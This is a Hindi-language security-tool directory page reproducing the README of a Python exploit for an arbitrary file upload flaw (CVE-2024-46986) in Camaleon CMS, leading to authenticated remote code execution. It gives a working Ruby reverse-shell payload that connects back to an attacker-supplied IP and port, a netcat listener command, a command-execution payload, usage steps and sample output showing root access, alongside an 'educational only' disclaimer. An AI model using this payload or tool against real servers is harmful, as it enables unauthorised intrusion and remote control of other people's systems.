Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46986 — कैमलियन CMS में मनमाना फ़ाइल अपलोड कमज़ोरी (CVE-2024-46986) के लिए स्वचालित Python एक्सप्लॉइट। प्रमाणित रिमोट कोड निष्पादन के लिए रिवर्स शेल और कमांड निष्पादन पेलोड का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/vidura2/cve-2024-46986
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubvidura2/cve-2024-46986

CVE-2024-46986

कैमलियन CMS में मनमाना फ़ाइल अपलोड कमज़ोरी (CVE-2024-46986) के लिए स्वचालित Python एक्सप्लॉइट। प्रमाणित रिमोट कोड निष्पादन के लिए रिवर्स शेल और कमांड निष्पादन पेलोड का समर्थन करता है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-46986

Camaleon CMS शोषण - मनमानी फ़ाइल अपलोड

इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो Camaleon CMS में फ़ाइल अपलोड भेद्यता के शोषण को स्वचालित करती है। यह भेद्यता एक हमलावर को सर्वर पर मनमानी फ़ाइलें (जैसे Ruby स्क्रिप्ट) अपलोड करने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड निष्पादन (RCE) या अन्य गंभीर सुरक्षा प्रभाव हो सकते हैं।

विशेषताएँ

  • फ़ाइल अपलोड शोषण: लक्ष्य सर्वर पर दुर्भावनापूर्ण Ruby स्क्रिप्ट अपलोड करता है।
  • पेलोड विकल्प: रिवर्स शेल पेलोड और कमांड निष्पादन पेलोड के बीच चयन करें।
  • बार-बार कमांड निष्पादन: कमांड निष्पादन पेलोड के लिए, स्क्रिप्ट उपयोगकर्ता को बार-बार कमांड दर्ज करने की अनुमति देती है।
  • स्वचालन: Python के requests लाइब्रेरी का उपयोग करके पूरी प्रक्रिया को स्वचालित करता है।

पूर्व-आवश्यकताएँ

  • मान्य उपयोगकर्ता क्रेडेंशियल्स: शोषण के काम करने के लिए एक प्रमाणित सत्र आवश्यक है। आपको एक मान्य उपयोगकर्ता के auth_token और _cms_session की आवश्यकता है।

  • Python 3.x: सुनिश्चित करें कि आपके पास Python 3.x स्थापित है।

  • Python requests लाइब्रेरी: यदि पहले से स्थापित नहीं है तो requests लाइब्रेरी स्थापित करें।

    root@kitploit:~
    pip install requests
    

उपयोग

root@kitploit:~
रिपॉजिटरी को क्लोन करें:

bash

https://github.com/vidura2/CVE-2024-46986.git cd CVE-2024-46986

स्क्रिप्ट को संशोधित करें:

root@kitploit:~
Python स्क्रिप्ट में placeholder `your_auth_token_here`, `your_session_token_here`, और `https://target_site_here` को वास्तविक मानों से बदलें।
यदि रिवर्स शेल पेलोड का उपयोग कर रहे हैं, तो `your_ip` और `your_port` को अपने IP पते और उस पोर्ट से बदलें जिस पर आप एक लिसनर सेट करेंगे।

पेलोड प्रकार चुनें:

root@kitploit:~
रिवर्स शेल: रिवर्स शेल अपलोड करने के लिए, स्क्रिप्ट में `payload_type` वेरिएबल को "reverse_shell" पर सेट करें।
कमांड निष्पादन: सिस्टम कमांड निष्पादित करने वाली स्क्रिप्ट अपलोड करने के लिए, `payload_type` को "command_execution" पर सेट करें। आप लक्ष्य सर्वर पर निष्पादित करने के लिए बार-बार कमांड दर्ज कर सकेंगे।

शोषण चलाएं:

bash

python exploit_camaleon.py

यदि कमांड निष्पादन पेलोड का उपयोग कर रहे हैं, तो आप कई कमांड दर्ज कर सकते हैं:

bash

root@kitploit:~
निष्पादित करने के लिए एक सिस्टम कमांड दर्ज करें (या बाहर निकलने के लिए 'exit' टाइप करें): whoami
निष्पादित करने के लिए एक सिस्टम कमांड दर्ज करें (या बाहर निकलने के लिए 'exit' टाइप करें): ls
निष्पादित करने के लिए एक सिस्टम कमांड दर्ज करें (या बाहर निकलने के लिए 'exit' टाइप करें): exit

पेलोड प्रकार

  1. रिवर्स शेल

रिवर्स शेल पेलोड हमलावर की मशीन से वापस जुड़ता है, जिससे सर्वर पर रिमोट कोड निष्पादन की अनुमति मिलती है।

root@kitploit:~
Python कोड के अंदर Ruby स्क्रिप्ट में IP और पोर्ट को संशोधित करें।

उदाहरण पेलोड:

ruby

require 'socket' s = TCPSocket.open('your_ip', your_port) while (cmd = s.gets) IO.popen(cmd, 'r') do |io| s.print io.read end end

netcat का उपयोग करके अपनी मशीन पर एक लिसनर सेट करें:

bash

root@kitploit:~
nc -lvnp <your_port>

2. कमांड निष्पादन

यह पेलोड एक Ruby स्क्रिप्ट अपलोड करता है जो सर्वर पर सिस्टम कमांड (उदाहरण: whoami) निष्पादित करती है। निष्पादन के दौरान आप बार-बार कमांड दर्ज कर सकते हैं।

root@kitploit:~
यह स्क्रिप्ट तब तक कमांड मांगती रहेगी जब तक आप exit टाइप नहीं करते।
उदाहरण:

ruby

system("whoami")

सफल शोषण का उदाहरण

एक बार शोषण सफलतापूर्वक निष्पादित हो जाने पर, आपको टर्मिनल में सफलता दर्शाने वाला आउटपुट देखना चाहिए:

python

Exploit executed successfully with payload type: reverse_shell!

यदि आप रिवर्स शेल का उपयोग करते हैं, तो netcat लिसनर को समझौता किए गए सर्वर के शेल तक पहुंच प्रदान करनी चाहिए।

कमांड निष्पादन पेलोड के लिए:

bash

Enter a system command to execute (or type 'exit' to quit): whoami Command 'whoami' executed successfully! Response: root

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस शोषण के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। भेद्यताओं का परीक्षण या शोषण करने से पहले हमेशा सुनिश्चित करें कि आपके पास अनुमति है।

योगदान

सुधार या अतिरिक्त सुविधाओं के लिए बेझिझक issues या pull requests सबमिट करें!

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें